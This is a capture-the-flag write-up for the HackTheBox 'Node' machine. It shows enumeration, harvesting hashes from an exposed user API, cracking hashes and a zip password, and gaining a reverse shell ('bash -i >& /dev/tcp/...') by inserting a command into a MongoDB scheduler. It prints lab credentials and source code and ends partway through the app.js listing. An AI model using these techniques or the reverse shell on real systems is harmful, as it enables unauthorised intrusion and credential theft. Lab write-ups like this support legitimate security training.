WriteupsHTB — Node
WebMediumLinux
HTB — Node
Node.js API endpoint exposes hashed admin credentials. MongoDB backup decryption and SUID binary analysis for root.
April 5, 2022HackTheBox
#Node.js#MongoDB#API#SUID
Enumeration
sh
nmap -sC -sV 10.10.10.58 -oN node_scansh
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelsh
nmap -A -p- -sC -sV 10.10.10.58 -oN node_scan_2- Cannot use dirbuster, gobuster or any other automated directory search tools. There is a filter that prevents the usage of these tools
sh
gobuster dir -u http://10.10.10.58:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -n- If we curl we can find info and response
sh
curl -vvv 10.10.10.58:3000curl sh
* Trying 10.10.10.58:3000...
* Connected to 10.10.10.58 (10.10.10.58) port 3000 (#0)
> GET / HTTP/1.1
> Host: 10.10.10.58:3000
> User-Agent: curl/7.81.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< X-Powered-By: Express
< Accept-Ranges: bytes
< Cache-Control: public, max-age=0
< Last-Modified: Sat, 02 Sep 2017 11:27:58 GMT
< ETag: W/"f15-15e4258ef70"
< Content-Type: text/html; charset=UTF-8
< Content-Length: 3861
< Date: Fri, 11 Mar 2022 04:14:30 GMT
< Connection: keep-alive
<
<!doctype html>
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]> <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en" ng-csp="" ng-app="myplace"> <!--<![endif]-->
<head>
<base href="/">
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>MyPlace</title>
<!-- Bootstrap Core CSS -->
<link href="/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
<!-- Theme CSS -->
<link href="/assets/css/freelancer.min.css" rel="stylesheet">
<link href="/assets/css/app.css" rel="stylesheet">
<!-- Custom Fonts -->
<link href="/vendor/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Lato:400,700,400italic,700italic" rel="stylesheet" type="text/css">
</head>
<body id="page-top" class="index">
<!-- Navigation -->
<nav id="mainNav" class="navbar navbar-default navbar-fixed-top navbar-custom">
<div class="container">
<!-- Brand and toggle get grouped for better mobile display -->
<div class="navbar-header page-scroll">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1">
<span class="sr-only">Toggle navigation Menu <i class="fa fa-bars"></i>
</button>
<a class="navbar-brand" href="/">MyPlace</a>
</div>
<!-- Collect the nav links, forms, and other content for toggling -->
<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
<ul class="nav navbar-nav navbar-right">
<li class="hidden">
<a href="/"></a>
</li>
<li class="page-scroll">
<a href="/login">Login</a>
</li>
</ul>
</div>
<!-- /.navbar-collapse -->
</div>
<!-- /.container-fluid -->
</nav>
<!-- Header -->
<header>
<div class="container">
<div class="row">
<div class="col-lg-12">
<img class="img-responsive" src="img/profile.png" alt="">
<div class="intro-text">
<span class="name">Welcome to MyPlace
</div>
</div>
</div>
</div>
</header>
<!--[if lt IE 8]>
<p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
<![endif]-->
<div data-ng-view=""></div>
</body>
<script type="text/javascript" src="vendor/jquery/jquery.min.js"></script>
<script type="text/javascript" src="vendor/bootstrap/js/bootstrap.min.js"></script>
<script type="text/javascript" src="vendor/angular/angular.min.js"></script>
<script type="text/javascript" src="vendor/angular/angular-route.min.js"></script>
<script type="text/javascript" src="assets/js/app/app.js"></script>
<script type="text/javascript" src="assets/js/app/controllers/home.js"></script>
<script type="text/javascript" src="assets/js/app/controllers/login.js"></script>
<script type="text/javascript" src="assets/js/app/controllers/admin.js"></script>
<script type="text/javascript" src="assets/js/app/controllers/profile.js"></script>
<script type="text/javascript" src="assets/js/misc/freelancer.min.js"></script>
</html>
* Connection #0 to host 10.10.10.58 left intact- We can specified the header
sh
curl -H "User-Agent: Dirbuster" 10.10.10.58:3000sh
curl -H "User-Agent: Dirbuster" 10.10.10.58:3000 root@sake
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
QQQQQQQP'.yQQQQQQQQQQQP" <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
QQQQQP'_a.<aamQQQW!<yF "!` .. "??$Qa "WQQQWTVP' "??' =QQmWWV?46/ ?QQQQQ
QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
QQ[ j@mQP'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"` -?QzQ7L ]QQQ
QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa .QP4QQQQfWkl jQQQ
QE ]QkQk $D?` waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQDQf(.QWQQ
QQ,-Qm4Q/-QmQ6 "WWQma/ "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@ "QW@?$:.yQQQQ
QQm/-4wTQgQWQQ, ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^ ` ]6QQ' yQQQQQ
QQQQw,-?QmWQQQQw a, ?QWWQQQw _. "????9VWaamQWV???" a j/ ]QQf jQQQQQQ
QQQQQQw,"4QQQQQQm,-$Qa ???4F jQQQQQwc <aaas _aaaaa 4QW ]E )WQ`=QQQQQQQ
QQQQQQWQ/ $QQQQQQQa ?H ]Wwa, ???9WWWh dQWWW,=QWWU? ?! )WQ ]QQQQQQQ
QQQQQQQQQc-QWQQQQQW6, QWQWQQQk <c jWQ ]QQQQQQQ
QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,., . .; QWQ.]QQQQQQQ
QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,, --~-- --- . _ssawmQQQQQQk 3QQQQWQ
QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ
QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ
QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW
QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,. -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ
QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ
QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ
<!-- 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 -->#Exploitation
- Inspecting the website we found couple interesting paths
- assets/js/app/app.js
- assets/js/app/controllers/home.js
- assets/js/app/controllers/login.js
- assets/js/app/controllers/admin.js
- assets/js/app/controllers/profile.js
- assets/js/misc/freelancer.min.js
- Let’s check /api/admin/backup found in /admin.js
- Nothing really interesting here
- /api/users/
sh
0
_id "59a7365b98aa325cc03ee51c"
username "myP14ceAdm1nAcc0uNT"
password "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af"
is_admin true
1
_id "59a7368398aa325cc03ee51d"
username "tom"
password "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240"
is_admin false
2
_id "59a7368e98aa325cc03ee51e"
username "mark"
password "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73"
is_admin false
3
_id "59aa9781cced6f1d1490fce9"
username "rastating"
password "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0"
is_admin false
- Using an online password cracker → https://crackstation.net/
sh
dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af # manchester
de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73 # snowflake
5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0 # Not found
Logged in with myP14ceAdm1nAcc0uNT | manchester
- Download the backup file
- Looks like a base64
sh
file myplace.backup
-> myplace.backup: ASCII text, with very long lines (65536), with no line terminators- Translate the base64 file
sh
cat myplace.backup | base64 -d > myplacesh
file myplace
-> myplace: Zip archive data, at least v1.0 to extract, compression method=storesh
unzip myplace # requires passwordsh
fcrackzip -uDp /usr/share/wordlists/rockyou.txt ./myplace
[-u] use unzip to weed out wrong passowrds
[-D] use a dictionary
[-p] use string as initial password/file
PASSWORD FOUND!!!!: pw == magicword- Opening app.js we can find some credentials
- mark | 5AYRft73VtFpc84k
sh
ssh mark@10.10.10.58
- The flag is in tom but we need privileges to get access to tom
sh
ps aux # see the running processes
- There is an interesting path /var/scheduler/app.js
sh
nano /var/scheduler/app.jssh
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';
MongoClient.connect(url, function(error, db) {
if (error || !db) {
console.log('[!] Failed to connect to mongodb');
return;
}
setInterval(function () {
db.collection('tasks').find().toArray(function (error, docs) {
if (!error && docs) {
docs.forEach(function (doc) {
if (doc) {
console.log('Executing task ' + doc._id + '...');
exec(doc.cmd);
db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
}
});
}
else if (error) {
console.log('Something went wrong: ' + error);
}
});
}, 30000);
});- mongo db stores information as collections.
- We can connect to the scheduler database and insert a new collection in tasks with the command we want and it will execute in (doc.cmd)
- mark : 5AYRft73VtFpc84k
- Conencting to the database scheduler. Ref → https://docs.mongodb.com/v4.4/mongo/
sh
mongo --username mark --password 5AYRft73VtFpc84k scheduler
> show collections
tasks- SSH with another terminal and place a reverse shell in /tmp
sh
ssh mark@10.10.10.58
cd /tmp
nano shell.sh
---
bash -i >& /dev/tcp/10.10.14.18/8080 0>&1
---
nc -lvnp 8080sh
db.tasks.find()
db.tasks.insertOne({cmd: "bash /tmp/shell.sh"});
---
{
"acknowledged" : true,
"insertedId" : ObjectId("622bbe2b5804df2507a28893")
}
---
db.tasks.find() # Check if the task is still there if not we already got a shellInteractive Shell
sh
which python
python -c 'import pty;pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo
fg
[enter]
export TERM=screen
cat /tom/user.txt
-> e1156acc...Privilege Escalation
- Looking at the myplace /app.js this part will help to escalate privileges
sh
find / -perm -u=s 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/local/bin/backup
/usr/bin/chfn
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/newuidmap
/bin/ping
/bin/umount
/bin/fusermount
/bin/ping6
/bin/ntfs-3g
/bin/su
/bin/mountsh
cd /usr/local/binsh
app.js
---
const express = require('express');
const session = require('express-session');
const bodyParser = require('body-parser');
const crypto = require('crypto');
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const path = require("path");
const spawn = require('child_process').spawn;
const app = express();
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
MongoClient.connect(url, function(error, db) {
if (error || !db) {
console.log('[!] Failed to connect to mongodb');
return;
}
app.use(session({
secret: 'the boundless tendency initiates the law.',
cookie: { maxAge: 3600000 },
resave: false,
saveUninitialized: false
}));
app.use(function (req, res, next) {
var agent = req.headers['user-agent'];
var blacklist = /(DirBuster)|(Postman)|(Mozilla\/4\.0.+Windows NT 5\.1)|(Go\-http\-client)/i;
if (!blacklist.test(agent)) {
next();
}
else {
count = Math.floor((Math.random() * 10000) + 1);
randomString = '';
var charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
for (var i = 0; i < count; i++)
randomString += charset.charAt(Math.floor(Math.random() * charset.length));
res.set('Content-Type', 'text/plain').status(200).send(
[
'QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ',
'QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ',
'QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ',
'QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ',
'QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQQQQQQQQQQQQQQQQQ',
'QQQQQQQQQQQQQP\'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ',
'QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ',
'QQQQQQQQQQW\' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ',
'QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ',
'QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ',
'QQQQQQQP\'.yQQQQQQQQQQQP" <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ',
'QQQQQP\'_a.<aamQQQW!<yF "!` .. "??$Qa "WQQQWTVP\' "??\' =QQmWWV?46/ ?QQQQQ',
'QQQP\'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ',
'QQ[ j@mQP\'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"` -?QzQ7L ]QQQ',
'QW jQkQ@ jWQQD\'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa .QP4QQQQfWkl jQQQ',
'QE ]QkQk $D?` waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ',
'QQ,-Qm4Q/-QmQ6 "WWQma/ "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@ "QW@?$:.yQQQQ',
'QQm/-4wTQgQWQQ, ?4WWk 4waac -???$waQQQQQQQQF??\'<mWWWWWQW?^ ` ]6QQ\' yQQQQQ',
'QQQQw,-?QmWQQQQw a, ?QWWQQQw _. "????9VWaamQWV???" a j/ ]QQf jQQQQQQ',
'QQQQQQw,"4QQQQQQm,-$Qa ???4F jQQQQQwc <aaas _aaaaa 4QW ]E )WQ`=QQQQQQQ',
'QQQQQQWQ/ $QQQQQQQa ?H ]Wwa, ???9WWWh dQWWW,=QWWU? ?! )WQ ]QQQQQQQ',
'QQQQQQQQQc-QWQQQQQW6, QWQWQQQk <c jWQ ]QQQQQQQ',
'QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ\'.mQQQmaa,., . .; QWQ.]QQQQQQQ',
'QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ',
'QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ',
'QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,, --~-- --- . _ssawmQQQQQQk 3QQQQWQ',
'QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ',
'QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ',
'QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ',
'QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW',
'QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,. -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ',
'QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ',
'QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ',
'QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ',
'',
'',
'<!-- ' + randomString + ' -->'
].join("\n")
);
}
});
app.use(express.static(path.join(__dirname, 'static')));
app.use(bodyParser.json());
app.use(function(err, req, res, next) {
if (err) {
res.status(err.status || 500);
res.send({
message:"Uh oh, something went wrong!",
error: true
});
}
else {
next();
}
});
app.get('/api/users/?', function (req, res) {
db.collection('users').find().toArray(function (error, docs) {
if (error) {
res.status(500).send({ error: true });
}
else if (!docs) {
res.status(404).send({ not_found: true });
}
else {
res.send(docs);
}
});
});
app.get('/api/users/latest', function (req, res) {
db.collection('users').find({ is_admin: false }).toArray(function (error, docs) {
if (error) {
res.status(500).send({ error: true });
}
else if (!docs) {
res.status(404).send({ not_found: true });
}
else {
res.send(docs);
}
});
});
app.get('/api/users/:username', function (req, res) {
db.collection('users').findOne({ username: req.params.username }, function (error, doc) {
if (error) {
res.status(500).send({ error: true });
}
